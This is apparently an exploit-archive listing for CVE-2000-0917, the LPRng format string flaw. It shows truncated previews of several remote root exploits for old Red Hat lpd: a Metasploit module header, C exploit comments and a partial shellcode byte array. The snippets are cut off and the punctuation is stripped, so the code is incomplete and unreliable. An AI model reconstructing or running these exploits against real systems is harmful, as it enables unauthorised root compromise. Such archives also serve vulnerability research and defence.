CVE-2000-0917

## # $Id: lprng_format_stringrb 9666 2010-07-03 01:09:32Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...

/* * REMOTE ROOT EXPLOIT for linux x86 - LPRng-3624-1 (RedHat 70) * * The RedHat 70 replaced the BSD lpr with the LPRng package which is * vulnerable to format string attacks because it passes information * to the syslog incorrectly * You can get remote root access on machines running RedHat 70 with * lpd running (port 515/tcp) if ...

/* * Copyright (c) 2000 - Securityis * * The following material may be freely redistributed, provided * that the code or the disclaimer have not been partly removed, * altered or modified in any way The material is the property * of securityis You are allowed to adopt the represented code * in your programs, given that you give cre ...

/* * LPRng remote root exploit for x86 Linux * 9/27/00 * * - sk8 * tested on compiled LPRng 3622/23/24 * */ #include <unistdh> #include <stdioh> char sc[]= "\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff" "\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39" "\xf9\x75\xf5\x39\xd3\x7e\x ...